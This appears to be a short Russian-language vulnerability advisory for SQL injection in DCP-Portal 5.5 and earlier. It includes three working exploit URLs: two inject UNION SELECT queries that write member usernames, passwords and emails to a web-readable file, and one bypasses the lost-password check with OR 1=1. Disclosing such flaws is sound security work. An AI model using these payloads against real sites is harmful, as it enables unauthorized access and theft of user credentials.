Программа: DCP-Portal 5.5 и более ранние версии 

Уязвимость обнаружена в DCP-Portal 5.x. Удаленный атакующий может выполнить произвольный SQL код на основной базе данных.
DCP-Portal не проверяет данные, представленные пользователем, перед передачей их к динамическому SQL запросу в различных параметрах и сценариях. В результате удаленный пользователь может манипулировать SQL запросом, чтобы обойти идентификацию, манипулировать данными и извлекать произвольные данные. 

Пример/Эксплоит: 

http://localhost/dcp/advertiser.php? adv_logged=1&username=1&password=qwe'
or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe'
or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile
'/var/www/html/dcpad.txt

http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии